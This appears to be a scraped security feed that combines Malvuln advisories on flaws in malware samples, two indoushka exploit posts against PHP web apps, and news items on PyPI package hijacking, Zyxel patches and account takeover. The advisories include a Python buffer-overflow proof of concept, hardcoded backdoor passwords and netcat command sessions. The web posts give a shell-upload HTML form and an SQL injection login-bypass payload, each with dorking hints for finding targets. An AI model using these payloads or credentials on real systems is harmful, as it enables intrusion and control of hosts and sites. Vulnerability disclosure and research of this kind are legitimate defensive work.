Backdoor.Win32.Symmi.qua malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6e81618678ddfee69342486f6b5ee780.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Symmi.qua  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on two random high TCP ports, when connecting (ncat) one port will return a single character like "♣" ord(a) "9827" the other ports return no response, target the non responsive port. Third-party adversaries who can detect and reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Symmi  
Type: PE32  
MD5: 6e81618678ddfee69342486f6b5ee780  
SHA256: a073f0bf8599352b57540930c36d655ba9e5a5afeb0c2606b07372e62476d3b3  
Vuln ID: MVID-2024-0692  
Dropped files: ksomnbi.dll   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/03/2024

Memory Dump:  
(1834.3f0): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=fffff74a edx=027ff640 esi=00000000 edi=00000002  
eip=76fced3c esp=027ff038 ebp=027ff078 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:007> .ecxr  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00

0:007> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

FAULTING_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

EXCEPTION_RECORD:  027ff23c -- (.exr 0x27ff23c)  
ExceptionAddress: 10001f32 (ksomnbi+0x00001f32)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 02800000  
Attempt to write to address 02800000

PROCESS_NAME:  Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  027ff28c -- (.cxr 0x27ff28c)  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00  
Resetting default scope

WRITE_ADDRESS:  02800000 

FOLLOWUP_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

FAULTING_THREAD:  000003f0

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 10002fc3 to 10001f32

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
027ff6fc 10002fc3 027ff74a 02517ff0 00000001 ksomnbi+0x1f32  
027fff80 41414141 41414141 41414141 41414141 ksomnbi+0x2fc3  
027fff84 41414141 41414141 41414141 41414141 0x41414141  
027fff88 41414141 41414141 41414141 41414141 0x41414141  
027fff8c 41414141 41414141 41414141 41414141 0x41414141  
027fff90 41414141 41414141 41414141 41414141 0x41414141  
027fff94 41414141 41414141 41414141 41414141 0x41414141  
027fff98 41414141 41414141 41414141 41414141 0x41414141  
027fff9c 41414141 41414141 41414141 41414141 0x41414141  
027fffa0 41414141 41414141 41414141 41414141 0x41414141  
027fffa4 41414141 41414141 41414141 41414141 0x41414141  
027fffa8 41414141 41414141 41414141 41414141 0x41414141  
027fffac 41414141 41414141 41414141 41414141 0x41414141  
027fffb0 41414141 41414141 41414141 41414141 0x41414141  
027fffb4 41414141 41414141 41414141 41414141 0x41414141  
027fffb8 41414141 41414141 41414141 41414141 0x41414141  
027fffbc 41414141 41414141 41414141 41414141 0x41414141  
027fffc0 41414141 41414141 41414141 41414141 0x41414141  
027fffc4 41414141 41414141 41414141 41414141 0x41414141  
027fffc8 41414141 41414141 41414141 41414141 0x41414141  
027fffcc 41414141 41414141 41414141 41414141 0x41414141  
027fffd0 41414141 41414141 41414141 41414141 0x41414141  
027fffd4 41414141 41414141 41414141 41414141 0x41414141  
027fffd8 41414141 41414141 41414141 41414141 0x41414141  
027fffdc 41414141 41414141 41414141 41414141 0x41414141  
027fffe0 41414141 41414141 41414141 41414141 0x41414141  
027fffe4 41414141 41414141 41414141 41414141 0x41414141  
027fffe8 41414141 41414141 41414141 41414141 0x41414141  
027fffec 41414141 41414141 41414141 41414141 0x41414141  
027ffff0 41414141 41414141 41414141 00000000 0x41414141  
027ffff4 41414141 41414141 00000000 00000000 0x41414141  
027ffff8 41414141 00000000 00000000 00000000 0x41414141  
027ffffc 00000000 00000000 00000000 00000000 0x41414141

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ksomnbi+1f32

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ksomnbi

IMAGE_NAME:  ksomnbi.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  537a7d0a

STACK_COMMAND:  .cxr 0x27ff28c ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_ksomnbi.dll!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_ksomnbi+1f32

Followup: MachineOwner  
---------

0:007> !exchain  
027ff0f0: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
027ff710: ksomnbi+30df (100030df)  
027fffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

def doit():

    MALWARE_HOST="x.x.x.x"  
    PORT=6917   #random port

    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    PAYLOAD="CONNECT /"+"A"*2878 + " HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2878\r\nHost: "+MALWARE_HOST  
    s.send(PAYLOAD.encode())  
    s.close()

while 1:  
    doit()  
    time.sleep(0.5)

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Symmi.qua MVID-2024-0692 Buffer Overflow

HackTool.Win32.Freezer.br (WinSpy) malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2992129c565e025ebcb0bb6f80c77812.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: HackTool.Win32.Freezer.br (WinSpy)Vulnerability: Insecure Credential StorageDescription: The malware listens on TCP ports 443, 80 and provides a web interface for remote access to victim information like screenshots etc.The username "AZURE" is in a hidden in a file named "resu.dll" under AppData\Local\Temp\Compress0 and the password is stored in cleartext "DREAMS" in "ssap.dll"Family: FreezerType: PE32MD5: 2992129c565e025ebcb0bb6f80c77812SHA256: e47a267cdc2a8443d5d7184e1023eef81c4b6a5bf9ecc24f1c6c345fe98bab8eVuln ID: MVID-2024-0691Disclosure: 09/03/2024Exploit/PoC:Login to the Win-Spy web UI using the credentials "AZURE" / "DREAMS" Web URLs available on the infected host.WebCam Shots (0)http://VICTIM_MACHINE/audio/Screen Shots (16)http://VICTIM_MACHINE/pictures/Reports (2)http://VICTIM_MACHINE/documents/Downloadclog.txtlog.txtDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

HackTool.Win32.Freezer.br (WinSpy) MVID-2024-0691 Insecure Credential Storage

Backdoor.Win32.Optix.02.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Optix.02.bVulnerability: Weak Hardcoded CredentialsDescription: Optix listens on TCP port 5151 and is packed with ASPack (2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and dump using OllyDumpEx. The unpacked PE file reveals a very weak three character cleartext password "1q1" stored as "svrpwd=1q1" at offset: 0000da4c of the unpacked malware. Commands sent to the backdoor use a semicolon ";" as a marker E.g. password;1q1;Family: OptixType: PE32MD5: 706ddc06ebbdde43e4e97de4d5af3b19SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1cVuln ID: MVID-2024-0690Disclosure: 09/03/2024Exploit/PoC:nc64.exe x.x.x.x 5151password;1q1;password;1;Optix Lite v0.2 Server Ready...ExecFile;"c:\Windows\System32\calc.exe"Response;File Ran SuccessfullyGetPath;TheServerPath;c:\windows\sec32.exeGetSysDir;TheSysDir;;C:\WINDOWS\system32\GetWinDir;TheWinDir;;C:\WINDOWS\KillProcPls;pestudio.exe;Response;Program killed successfully!KillProcPls;die.exe;Response;Program killed successfully!GetProcsPls;HeresDaProcs;[System Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;...Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Optix.02.b MVID-2024-0690 Hardcoded Credential

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4dc39c05bcc93e600dd8de16f2f7c599.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4)Vulnerability: Unauthenticated Remote Command ExecutionFamily: JustJokeType: PE32MD5: 4dc39c05bcc93e600dd8de16f2f7c599SHA256: 55662483e663bde98d729489c6b25986003a40df1e2be376b0c3b20d2d6c7987 Vuln ID: MVID-2024-0689Dropped files: Scanvegw.exeDisclosure: 09/03/2024Description: The malware listens on TCP port 28072.  Upon execution, throws an error alert dialog with message: "File DATA1.CAB not found!". The backdoor then drops a hidden PE file named "Scanvegw.exe" in SysWoW64 use attrib -s -h. The malware then makes outbound connections to SMTP port 25. Hit enter twice when sending commands use "E" for Execute and "T" for Terminate. Calling programs incorrectly still gives a response of "Executed!" when it actually fails. The malware calls Win32 WinExec API, supply full path to the file.0046A0CC                 push    eax             ; lpCmdLine0046A0CD                 call    WinExec0046A0D2                 push    offset aTmp     ; "tmp!?!"0046A0D7                 push    [ebp+var_C]0046A0DA                 push    offset aExecuted ; " Executed!"0046A0DF                 lea     eax, [ebp+var_168]0046A0E5                 mov     edx, 30046A0EA                 call    sub_40495CExploit/PoC:nc64.exe x.x.x.x 28072E "c:\\Windows\\System32\\calc.exe";tmp!?!"c:\\Windows\\System32\\calc.exe";Executed!E GetDir;tmp!?!GetDir; Executed!GetDir;C:\WINDOWS\system32@AudioToastIcon.png@EnrollmentToastIcon.png@VpnToastIcon.png@WirelessDisplayToast.pngaadauthhelper.dllaadtb.dllAboveLockAppHost.dllaccessibilitycpl.dllE GetDrive;tmp!?!GetDrive; Executed!GetDrive;c: d:GetFiles;GetSpace;Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) MVID-2024-0689 Code Execution

Backdoor.Win32.PoisonIvy.ymw malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.PoisonIvy.ymwVulnerability: Insecure Credential StorageFamily: PoisonIvyType: PE32MD5: b0748f1c1a17bad44dc9bd750fc97547SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920Vuln ID: MVID-2024-0688Dropped files: PILib.dll, Poison Ivy.ini, .pipDisclosure: 09/03/2024Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext."malvuln.pip" [Advanced]PEbinary=1PEc=0PEd=0PEp=0PE=1FileAlign=512KeyLogger=0InjectServer=0Persistence=0ProcessMutex=)!VoqA.I4CustomInject=0CustomInjectProc=msnmsgr.exe[Connection]Group=HijackProxy=0HijackProxyPersist=0DNS=192.168.18.125:3460:0,ID=malvulnPassword=apparitionsecPasswordKey=0Proxy=0ProxyDNS=[Install]Startup=0StartupHKLM=1StartupActiveX=0ActiveXKey=HKLMName=Copy=0Filename=CopySystem=1CopyWindows=0ADS=0Melt=0[Build]Icon=bThirdParty=0ThirdParty=upx.exe "%s""Poison Ivy.ini"[Disclaimer]Show=1[Settings]RemoveKeyFile=1StorePlugins=1SDrounds=3HidePW=0PlaySound=0SoundPath=%PI%\sound.wavCache=1CachePath=%PI%\Users\%USR%\ImagePath=%PI%\Users\%USR%\Images\AudioPath=%PI%\Users\%USR%\Audio\NotesPath=%PI%\Notes\AutoRefresh=0WindowColor=1TimestampColor=1KeynameColor=1WindowName=008000Timestamp=0000FFKeyname=808080AutoRemove=1AutoLookUpdates=1SimTransfers=2DownloadPath=%PI%\Users\%USR%\Download\ProfilePath=%PI%\Profiles\PluginPath=%PI%\Plugins\TreeLayout=1CloseTray=0MinimizeTray=1BalloonTip=1Prompt=0PromptExit=0PromptDelete=1ColumnInfo=1Groups=0ColumnPath=%PI%\Data\Thumbs=0ThumbSize=96Highlight=0HighlightExt=ScrSize=75ScrBits=24ShareTo=ShareToSocks=ShareSocks=0[Placement]DataTransfers=1MaximizedState=0Top=63Left=416Width=936Height=540ConTop=132ConLeft=260ConWidth=650ConHeight=380[Client0]Port=3460KeyFile=0Password=adminExploit/PoC:DE:0055DD64 aPassword_7     db 'Password: *****',0  ; DATA XREF: sub_55D128+292↑oCODE:0055DD74                 dd 0FFFFFFFFh, 5CODE:0055DD7C aAdmin_2        db 'admin',0            ; DATA XREF: sub_55D128:loc_55D3C6↑o004016C0                 db  61h ; a004016C1                 db  70h ; p004016C2                 db  70h ; p004016C3                 db  61h ; a004016C4                 db  72h ; r004016C5                 db  69h ; i004016C6                 db  74h ; t004016C7                 db  69h ; i004016C8                 db  6Fh ; o004016C9                 db  6Eh ; n004016CA                 db  73h ; s004016CB                 db  65h ; e004016CC                 db  63h ; cDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.PoisonIvy.ymw MVID-2024-0688 Insecure Credential Storage

Online Travel Agency System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Travel Agency System 1.0 Shell Upload

Tourism Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 Auth BY Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://localhost/tourism/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tourism Management System 1.0 SQL Injection

A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations.
It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package

A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been exploited in the wild in an attempt to infiltrate downstream organizations.

It has been codenamed Revival Hijack by software supply chain security firm JFrog, which said the attack method could be used to hijack 22,000 existing PyPI packages and result in "hundreds of thousands" of malicious package downloads. These susceptible packages have more than 100,000 downloads or have been active for over six months.

"This attack technique involves hijacking PyPI software packages by manipulating the option to re-register them once they're removed from PyPI's index by the original owner," JFrog security researchers Andrey Polkovnychenko and Brian Moussalli said in a report shared with The Hacker News.

At its core, the attack hinges on the fact that several Python packages published in the PyPI repository get removed, making them available for registration to any other user.

Statistics shared by JFrog show that about 309 packages are removed each month on average. These could happen for any number of reasons: Lack of maintenance (i.e., abandonware), package getting re-published under a different name, or introducing the same functionality into official libraries or built-in APIs.

This also poses a lucrative attack surface that's more effective than typosquatting and which an attacker, using their own accounts, could exploit to publish malicious packages under the same name and a higher version to infect developer environments.

"The technique does not rely on the victim making a mistake when installing the package," the researchers said, pointing out how Revival Hijack can yield better results from the point of view of an adversary. "Updating a 'once safe' package to its latest version is viewed as a safe operation by many users."

While PyPI does have safeguards in place against author impersonation and typosquatting attempts, JFrog's analysis found that running the "pip list --outdated" command lists the counterfeit package as a new version of the original package, wherein the former corresponds to a different package from an entirely different author.

Even more concerning, running the "pip install –upgrade" command replaces the actual package with the phony one without not so much of a warning that the package's author has changed, potentially exposing unwitting developers to a huge software supply chain risk.

JFrog said it took the step of creating a new PyPI user account called "security\_holding" that it used to safely hijack the susceptible packages and replace them with empty placeholders so as to prevent malicious actors from capitalizing on the removed packages.

Additionally, each of these packages has been assigned the version number as 0.0.0.1 – the opposite of a dependency confusion attack scenario – to avoid getting pulled by developers when running a pip upgrade command.

What's more disturbing is that Revival Hijack has already been exploited in the wild, with an unknown threat actor called Jinnis introducing a benign version of a package named "pingdomv3" on March 30, 2024, the same day the original owner (cheneyyan) removed the package from PyPI.

On April 12, 2024, the new developer is said to have released an update containing a Base64-encoded payload that checks for the presence of the "JENKINS\_URL" environment variable, and if present, executes an unknown next-stage module retrieved from a remote server.

"This suggests that the attackers either delayed the delivery of the attack or designed it to be more targeted, possibly limiting it to a specific IP range," JFrog said.

The new attack is a sign that threat actors are eyeing supply chain attacks on a broader scale by targeting deleted PyPI packages in order to expand the reach of the campaigns. Organizations and developers are recommended to inspect their DevOps pipelines to ensure that they are not installing packages that have been already removed from the repository.

"Using a vulnerable behavior in the handling of removed packages allowed attackers to hijack existing packages, making it possible to install it to the target systems without any changes to the user's workflow," said Moussalli, JFrog Security Research Team Lead.

"The PyPI package attack surface is continually growing. Despite proactive intervention here, users should always stay vigilant and take the necessary precautions to protect themselves and the PyPI community from this hijack technique."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Hijack 22,000 Removed PyPI Packages, Spreading Malicious Code to Developers

Zyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands.

Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection.

"The improper neutralization of special elements in the

Vulnerability / Network Security

Zyxel has released software updates to address a critical security flaw impacting certain access point (AP) and security router versions that could result in the execution of unauthorized commands.

Tracked as CVE-2024-7261 (CVSS score: 9.8), the vulnerability has been described as a case of operating system (OS) command injection.

"The improper neutralization of special elements in the parameter 'host' in the CGI program of some AP and security router versions could allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device," Zyxel said in an advisory.

Chengchao Ai from the ROIS team of Fuzhou University has been credited with discovering and reporting the flaw.

Zyxel has also shipped updates for seven vulnerabilities in its routers and firewalls, including few that are high in severity, that could result in OS command execution, a denial-of-service (DoS), or access browser-based information -

*   CVE-2024-5412 (CVSS score: 7.5) - A buffer overflow vulnerability in the "libclinkc" library that could allow an unauthenticated attacker to cause DoS conditions by means of a specially crafted HTTP request

*   CVE-2024-6343 (CVSS score: 4.9) - A buffer overflow vulnerability that could allow an authenticated attacker with administrator privileges to trigger DoS conditions by means of a specially crafted HTTP request

*   CVE-2024-7203 (CVSS score: 7.2) - A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute OS commands

*   CVE-2024-42057 (CVSS score: 8.1) - A command injection vulnerability in the IPSec VPN feature that could allow an unauthenticated attacker to execute some OS commands

*   CVE-2024-42058 (CVSS score: 7.5) - A null pointer dereference vulnerability that could allow an unauthenticated attacker to cause DoS conditions by sending crafted packets

*   CVE-2024-42059 (CVSS score: 7.2) - A post-authentication command injection vulnerability that could allow an authenticated attacker with administrator privileges to execute some OS commands by uploading a crafted compressed language file via FTP

*   CVE-2024-42060 (CVSS score: 7.2) - A post-authentication command injection vulnerability in some firewall versions could allow an authenticated attacker with administrator privileges to execute some OS commands

*   CVE-2024-42061 (CVSS score: 6.1) - A reflected cross-site scripting (XSS) vulnerability in the CGI program "dynamic\_script.cgi" that could allow an attacker to trick a user into visiting a crafted URL with the XSS payload and obtain browser-based information

The development comes as D-Link said four security vulnerabilities affecting its DIR-846 router, counting two critical remote command execution vulnerabilities (CVE-2024-44342, CVSS score: 9.8) will not be patched owing to the products reaching end-of-life (EoL) status of February 2020, urging customers to replace them with support versions.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zyxel Patches Critical OS Command Injection Flaw in Access Points and Routers

Account takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, "Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them" argues that the

SaaS Security / Browser Security

Account takeover attacks have emerged as one of the most persistent and damaging threats to cloud-based SaaS environments. Yet despite significant investments in traditional security measures, many organizations continue to struggle with preventing these attacks. A new report, "Why Account Takeover Attacks Still Succeed, and Why the Browser is Your Secret Weapon in Stopping Them" argues that the browser is the primary battleground where account takeover attacks unfold and, thus, where they should be neutralized. The report also provides effective guidance for mitigating the account takeover risk.

Below are some of the key points raised in the report:

**The Role of the Browser in Account Takeovers**

According to the report, the SaaS kill chain takes advantage of the fundamental components that are contained within the browser. For account takeover, these include:

*   **Executed Web Pages** - Attackers can create phishing login pages or use MiTM over legitimate web pages to harvest and access credentials.
*   **Browser Extensions** - Malicious extensions can access and exfiltrate sensitive data.
*   **Stored Credentials** - Attackers aim to hijack the browser or exfiltrate its stored credentials to access SaaS apps.

Once the user's credentials are compromised, the attacker can login to the apps and operate with impunity inside. This is a different and much shorter kill chain compared to the on-premises kill chain, which is also why traditional security measures fail to protect against it.

**Dissecting Account Takeover TTPs**

The report then details the main account takeover tactics, techniques and procedures (TTPs). It analyzes how they operate, why traditional security controls are ineffective in protecting against them, and how a browser security platform can mitigate the risk.

**1\. Phishing**

**The risk:** Phishing attacks abuse the way the browser executes the webpage. There are two main types of phishing attacks: a malicious login page or intercepting a legitimate one to capture session tokens.

**The protection failure:** SSE solutions and firewalls cannot protect against these attacks since the malicious web page components cannot be seen in network traffic. As a result, the phishing components are able to enter the perimeter and the user's endpoint.

**The solution:** A browser security platform provides visibility into the execution of web pages and analyzes every executed component, detecting phishing activities like credential input fields and MiTM redirection. Then, these components are disabled within the page.

**2\. Malicious Browser Extensions**

**The risk:** Malicious extensions exploit the high privileges enabled by users to control the browser's activity and data, taking over stored credentials.

**The protection failure:** EDRs and EPPs often have implicit trust in browser processes, making extensions a security blind spot.

**The solution:** A browser security platform provides visibility and risk analysis of all extensions and automatically disables malicious ones.

**3\. Authentication and Access via a Login Page**

**The risk:** Once the attacker obtains credentials, they can access the targeted SaaS app.

**The protection failure:** IdPs struggle to differentiate between malicious and legitimate users and MFA solutions are often not fully implemented and adopted.

**The solution:** A browser security platform monitors all stored credentials in the browser, integrates with the IdP to act as an additional authentication factor, and enforces access from the browser to prevent access through compromised credentials.

**What's Next for Security Decision Makers**

The browser has become a critical attack surface for enterprises, and account takeover attacks exemplify its risk and the need to adapt the organizational security approach. LayerX has identified that a browser security solution is the key component in that shift, countering existing attack techniques that will force attackers to reevaluate their steps. Read the full report .

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#auth